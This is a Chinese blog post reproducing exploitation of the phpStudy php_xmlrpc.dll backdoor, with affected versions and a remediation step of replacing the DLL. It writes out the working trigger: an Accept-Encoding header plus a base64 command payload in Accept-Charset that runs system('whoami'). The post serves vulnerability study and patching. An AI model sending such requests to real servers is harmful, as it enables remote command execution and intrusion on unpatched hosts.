首页 > itarticle > phpstudy后门利用复现

phpstudy后门利用复现

admin 11月 11, 2020 0

phpstudy后门利用复现

一、环境背景

phpStudy软件是国内的一款免费的PHP调试环境的程序集成包。
通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装。
无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能

二、影响版本

phpstudy 2016
php5.4
phpstudy2018
php-5.2.17、php-5.4.45

三、复现过程

本来检测法,在对应有后门的php版本找后面门。
打开php_xmlrpc.dll模块中,搜索eval。

或者利用burp suite也可以检测出来

然后随意访问一个php文件,用burpsuite拦截数据包,添加如下的请求头字段:

Accept-Encoding中逗号后面的空格要去掉
Accept-Charset后面接着base64编码
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCd3aG9hbWknKTsNCg==

repeater重放数据包,触发后门执行命令

四、修复建议

phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以到PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll。
下载地址如下:

https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 [email protected]

微海报分享

近期文章

近期评论

标签

热门

文章归档

分类目录

功能